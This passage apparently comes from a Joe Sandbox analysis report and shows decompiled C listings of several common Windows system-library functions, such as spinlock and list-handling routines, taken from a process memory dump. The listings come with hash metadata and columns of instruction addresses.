                                          0x010d2bdb
                                          0x010d2c02
                                          0x010d2c05
                                          0x010d2c07
                                          0x00000000
                                          0x010d2c07
                                          0x010d2be0
                                          0x010d2c00
                                          0x010d2c3f
                                          0x010d2c3f
                                          0x00000000
                                          0x010d2c00
                                          0x010d2be5
                                          0x010d2be7
                                          0x010d2bec
                                          0x010d2bf4
                                          0x010d2bf6
                                          0x00000000
                                          0x010d2bf6
                                          0x010d2b70
                                          0x010d2b76
                                          0x010d2b2b
                                          0x010d2b2b
                                          0x010d2b2d
                                          0x010d2b2f
                                          0x010d2b32
                                          0x010d2b35
                                          0x010d2b3a
                                          0x00000000
                                          0x010d2b40
                                          0x010d2b43
                                          0x010d2b45
                                          0x010d2b47
                                          0x010d2b4a
                                          0x010d2b4d
                                          0x010d2b53
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010d2b53
                                          0x010d2b78
                                          0x010d2b78
                                          0x010d2b7b
                                          0x010d2b7e
                                          0x00000000
                                          0x010d2b7e
                                          0x010d2b76
                                          0x010d2ba5
                                          0x010d2ba5
                                          0x010d2ba8
                                          0x010d2bad
                                          0x00000000
                                          0x00000000
                                          0x010d2baf
                                          0x010d2baf
                                          0x010d2bc2
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e15d027a1dc4ed50e3d285d327d8f11367369976f068adb3ed1d204c487e520d
                                          • Instruction ID: c595572dce1262124aea18db61db32f24ee52b2174a88889a244716ad273bb49
                                          • Opcode Fuzzy Hash: e15d027a1dc4ed50e3d285d327d8f11367369976f068adb3ed1d204c487e520d
                                          • Instruction Fuzzy Hash: 93519376A00215CFCB18CF1CC8909BDB7F1FB88710719856AE8A69B355D774AE91CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0116AE44 Relevance: .2, Instructions: 152COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E0116AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0116C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0116ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0116FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0116EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E010C7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01161608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01171536(0x1198ae4, (_t74 -  *0x1198b04 >> 0x14) + (_t74 -  *0x1198b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0116C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0116A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0114CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0116ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                          0x0116ae44
                                          0x0116ae4c
                                          0x0116ae53
                                          0x0116ae55
                                          0x0116ae5c
                                          0x0116ae64
                                          0x0116ae68
                                          0x0116ae75
                                          0x0116ae75
                                          0x0116ae78
                                          0x0116ae7a
                                          0x0116ae7c
                                          0x0116ae7f
                                          0x0116aea8
                                          0x0116aeab
                                          0x0116aead
                                          0x00000000
                                          0x00000000
                                          0x0116aeb3
                                          0x0116aeb8
                                          0x0116aebb
                                          0x0116aebd
                                          0x00000000
                                          0x0116ae81
                                          0x0116ae88
                                          0x0116ae8f
                                          0x0116ae9b
                                          0x0116ae96
                                          0x0116ae96
                                          0x0116ae96
                                          0x0116aea0
                                          0x0116aea3
                                          0x0116aebf
                                          0x0116aebf
                                          0x0116aec3
                                          0x0116aec9
                                          0x0116af0d
                                          0x0116af14
                                          0x0116af3d
                                          0x0116af3d
                                          0x0116af41
                                          0x0116af44
                                          0x0116af67
                                          0x0116af67
                                          0x0116af6a
                                          0x0116afca
                                          0x0116afd1
                                          0x00000000
                                          0x0116afd1
                                          0x0116af6c
                                          0x0116af6d
                                          0x0116af75
                                          0x0116af7c
                                          0x0116af7e
                                          0x0116af80
                                          0x0116af85
                                          0x0116af87
                                          0x0116af99
                                          0x0116af89
                                          0x0116af92
                                          0x0116af92
                                          0x0116af9e
                                          0x0116afa1
                                          0x0116afa3
                                          0x0116afa9
                                          0x0116afb0
                                          0x0116afb2
                                          0x0116afb4
                                          0x0116afbc
                                          0x0116afbc
                                          0x0116afb4
                                          0x0116afb0
                                          0x00000000
                                          0x0116afa1
                                          0x0116af4f
                                          0x0116af57
                                          0x0116af5c
                                          0x0116af5e
                                          0x00000000
                                          0x00000000
                                          0x0116af60
                                          0x0116af64
                                          0x0116af64
                                          0x00000000
                                          0x0116af64
                                          0x0116af1a
                                          0x0116af25
                                          0x00000000
                                          0x00000000
                                          0x0116af27
                                          0x0116af28
                                          0x0116af33
                                          0x00000000
                                          0x0116aed0
                                          0x0116aed0
                                          0x0116aed2
                                          0x0116aee1
                                          0x0116aee4
                                          0x00000000
                                          0x00000000
                                          0x0116aee6
                                          0x0116aeec
                                          0x00000000
                                          0x00000000
                                          0x0116aefb
                                          0x0116af07
                                          0x0116afd3
                                          0x0116afdb
                                          0x0116afdb
                                          0x00000000
                                          0x0116af07
                                          0x0116aed6
                                          0x0116aed8
                                          0x0116aedf
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0116aedf
                                          0x0116aec9

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f0caf023fd37e0a5b3bce67990f030a623d50b54d07e171a2f52bdd473837e60
                                          • Instruction ID: df3b4e8deae4b2ec1e2ff2047869501cb8cfb509a2d9c0762f7af729053e1e4d
                                          • Opcode Fuzzy Hash: f0caf023fd37e0a5b3bce67990f030a623d50b54d07e171a2f52bdd473837e60
                                          • Instruction Fuzzy Hash: 0A4106B17002115BD72EDA2DE894B3FBBDDAF84614F044258F926A72D0DB36D821C793
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010CDBE9 Relevance: .1, Instructions: 149COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E010CDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E010ACC50(E010A4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E010C7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01178ED6(_t102, _t98);
						}
						_t76 = _v44;
						E010C2280(_t58, _v44);
						E010CDD82(_v44, _t102, _t98);
						E010CB944(_t102, _v5);
						return E010BFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1198628; // 0x0
							_v28 = _t67;
							_t68 =  *0x119862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1198628; // 0x0
						_t105 = _v28;
						_t80 =  *0x119862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x116fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                          0x010cdbe9
                                          0x010cdbf2
                                          0x010cdbf7
                                          0x010cdbf9
                                          0x010cdbfc
                                          0x010cdc00
                                          0x010cdc03
                                          0x010cdc14
                                          0x010cdd54
                                          0x010cdd54
                                          0x010cdd54
                                          0x010cdc18
                                          0x010cdc1d
                                          0x010cdc1d
                                          0x010cdc32
                                          0x010cdc3b
                                          0x010cdc3e
                                          0x010cdc46
                                          0x010cdd5b
                                          0x010cdd62
                                          0x010cdd64
                                          0x010cdd67
                                          0x010cdd69
                                          0x010cdd6b
                                          0x010cdd6e
                                          0x010cdd70
                                          0x010cdd73
                                          0x010cdd73
                                          0x00000000
                                          0x010cdc4c
                                          0x010cdc4e
                                          0x01113ae3
                                          0x01113ae8
                                          0x01113aea
                                          0x010cdce7
                                          0x010cdce9
                                          0x010cdcec
                                          0x010cdcee
                                          0x010cdcf0
                                          0x010cdcf3
                                          0x010cdcf5
                                          0x01113af2
                                          0x01113af5
                                          0x01113af5
                                          0x010cdd06
                                          0x010cdd08
                                          0x010cdd0b
                                          0x010cdd12
                                          0x01113b08
                                          0x010cdd18
                                          0x010cdd18
                                          0x010cdd18
                                          0x010cdd20
                                          0x010cdd23
                                          0x01113b16
                                          0x01113b16
                                          0x010cdd29
                                          0x010cdd2d
                                          0x010cdd36
                                          0x010cdd40
                                          0x010cdd51
                                          0x010cdd51
                                          0x010cdc54
                                          0x010cdc59
                                          0x010cdc59
                                          0x010cdc5e
                                          0x010cdc5e
                                          0x010cdc63
                                          0x010cdc66
                                          0x010cdc6b
                                          0x010cdc78
                                          0x010cdc7b
                                          0x010cdc81
                                          0x010cdc81
                                          0x010cdc83
                                          0x010cdc89
                                          0x00000000
                                          0x00000000
                                          0x010cdd7b
                                          0x010cdd7b
                                          0x010cdc8f
                                          0x010cdc8f
                                          0x010cdc92
                                          0x010cdc99
                                          0x010cdc9f
                                          0x010cdca5
                                          0x010cdcaa
                                          0x010cdcaa
                                          0x010cdcb3
                                          0x010cdcb8
                                          0x010cdcbb
                                          0x010cdcc1
                                          0x010cdccf
                                          0x010cdcd2
                                          0x010cdcd5
                                          0x010cdcd7
                                          0x010cdcda
                                          0x010cdcdc
                                          0x010cdcdc
                                          0x010cdce2
                                          0x010cdce4
                                          0x00000000
                                          0x010cdce4

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff96490887eeee65f82175a46d64734277bfbf68eda415f6b5c55c6748dc227f
                                          • Instruction ID: 188e03c0cba8308973171fa88be36033efa7cc5df66e5c627692ff02ebff4645
                                          • Opcode Fuzzy Hash: ff96490887eeee65f82175a46d64734277bfbf68eda415f6b5c55c6748dc227f
                                          • Instruction Fuzzy Hash: 2A516D71E0061ADBCB14DFA8C480AAEFBF5BB49710F24816ED595A7345EB70A944CFD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010BEF40 Relevance: .1, Instructions: 147COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E010BEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E010A9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7709c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E010A2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                          0x010bef4b
                                          0x010bef4d
                                          0x010bef57
                                          0x010bf0bd
                                          0x010bf0c2
                                          0x010bf0d2
                                          0x010bf0d2
                                          0x010bf0c2
                                          0x010bef5d
                                          0x010bef5f
                                          0x010bef67
                                          0x010bef6a
                                          0x010bef6d
                                          0x010bef74
                                          0x010bef7f
                                          0x010bef82
                                          0x010bef82
                                          0x010bef86
                                          0x010bef88
                                          0x010bef8c
                                          0x010bef8f
                                          0x010bef8f
                                          0x010bef8f
                                          0x00000000
                                          0x010bef91
                                          0x010bef93
                                          0x010befc4
                                          0x010befc4
                                          0x010befc4
                                          0x010befca
                                          0x010befd0
                                          0x010bf0a6
                                          0x00000000
                                          0x00000000
                                          0x010bf0af
                                          0x0110bb06
                                          0x0110bb0a
                                          0x010bf0b5
                                          0x010bf0b5
                                          0x010bf0b5
                                          0x010bf0b5
                                          0x00000000
                                          0x010befd6
                                          0x010befd9
                                          0x010bf0de
                                          0x010bf0e2
                                          0x010befdf
                                          0x010befdf
                                          0x010befdf
                                          0x010befe5
                                          0x0110bafc
                                          0x0110bafc
                                          0x010befe5
                                          0x010befeb
                                          0x010befed
                                          0x010bf00f
                                          0x010bf011
                                          0x010bf01a
                                          0x010bf01d
                                          0x010bf021
                                          0x010bf028
                                          0x010bf029
                                          0x010bf029
                                          0x010bf02c
                                          0x00000000
                                          0x010bf02c
                                          0x010beff3
                                          0x010beff9
                                          0x010bf0ea
                                          0x010bf0ed
                                          0x010bf0ef
                                          0x00000000
                                          0x010bf0ef
                                          0x010bf003
                                          0x0110bb12
                                          0x010bf045
                                          0x010bf049
                                          0x010bf051
                                          0x010bf09e
                                          0x010bf0a0
                                          0x010bf0a0
                                          0x010bf09e
                                          0x010bf053
                                          0x010bf064
                                          0x010bf064
                                          0x010bf06b
                                          0x0110bb1a
                                          0x0110bb1a
                                          0x010bf071
                                          0x010bf071
                                          0x010bf07d
                                          0x010bf082
                                          0x010bf08f
                                          0x010bf08f
                                          0x010bf009
                                          0x010bf00d
                                          0x00000000
                                          0x010bf00d
                                          0x010befd0
                                          0x010bef97
                                          0x010befa5
                                          0x010befaa
                                          0x00000000
                                          0x010befac
                                          0x010befac
                                          0x010befac
                                          0x00000000
                                          0x010befb2
                                          0x010bf036
                                          0x010bf03a
                                          0x010bf040
                                          0x010bf090
                                          0x00000000
                                          0x010bf092
                                          0x010bf042
                                          0x00000000
                                          0x010bf042
                                          0x010befb7
                                          0x010befb9
                                          0x010befbc
                                          0x010befb0
                                          0x010befb0
                                          0x00000000
                                          0x010befbe
                                          0x010befbe
                                          0x010befc1
                                          0x00000000
                                          0x010befc1
                                          0x010befbc
                                          0x010befaa
                                          0x010bef91

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction ID: e214cd1dfdac734e8826bfd5e002e8bdd4d27b7bce25cff46f5823b5eb365ee4
                                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction Fuzzy Hash: 8551D130E0424ADFEB25CB6CC5D4BEEBBF1AF05314F1881E8E58597292C375A989C791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0117740D Relevance: .1, Instructions: 141COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E0117740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E010FD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E010EF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L010C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L010C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E010EF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L010C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                          0x0117740d
                                          0x0117740d
                                          0x01177412
                                          0x01177413
                                          0x01177416
                                          0x01177418
                                          0x0117741c
                                          0x0117741f
                                          0x01177422
                                          0x01177422
                                          0x01177428
                                          0x0117742a
                                          0x0117742a
                                          0x01177451
                                          0x01177432
                                          0x0117744f
                                          0x0117744f
                                          0x00000000
                                          0x01177434
                                          0x01177438
                                          0x01177443
                                          0x01177517
                                          0x01177517
                                          0x0117751a
                                          0x01177535
                                          0x01177520
                                          0x01177527
                                          0x0117752c
                                          0x01177531
                                          0x01177533
                                          0x00000000
                                          0x01177533
                                          0x00000000
                                          0x01177531
                                          0x0117754b
                                          0x0117754f
                                          0x0117755c
                                          0x0117755c
                                          0x0117755f
                                          0x01177560
                                          0x01177561
                                          0x01177562
                                          0x01177563
                                          0x01177568
                                          0x0117756a
                                          0x0117756c
                                          0x0117756d
                                          0x0117756d
                                          0x0117756f
                                          0x01177572
                                          0x01177574
                                          0x01177577
                                          0x0117757c
                                          0x0117757f
                                          0x00000000
                                          0x01177551
                                          0x01177551
                                          0x01177551
                                          0x01177553
                                          0x01177553
                                          0x01177449
                                          0x01177449
                                          0x0117744c
                                          0x0117744c
                                          0x00000000
                                          0x0117744c
                                          0x01177443
                                          0x0117750e
                                          0x01177514
                                          0x01177514
                                          0x01177455
                                          0x01177469
                                          0x0117746d
                                          0x00000000
                                          0x01177473
                                          0x01177473
                                          0x01177476
                                          0x01177480
                                          0x01177484
                                          0x0117748e
                                          0x01177493
                                          0x01177493
                                          0x01177496
                                          0x01177499
                                          0x011774a1
                                          0x011774b1
                                          0x011774b5
                                          0x00000000
                                          0x011774bb
                                          0x011774c1
                                          0x011774c1
                                          0x011774c4
                                          0x011774c5
                                          0x011774c6
                                          0x011774c7
                                          0x011774c8
                                          0x011774cd
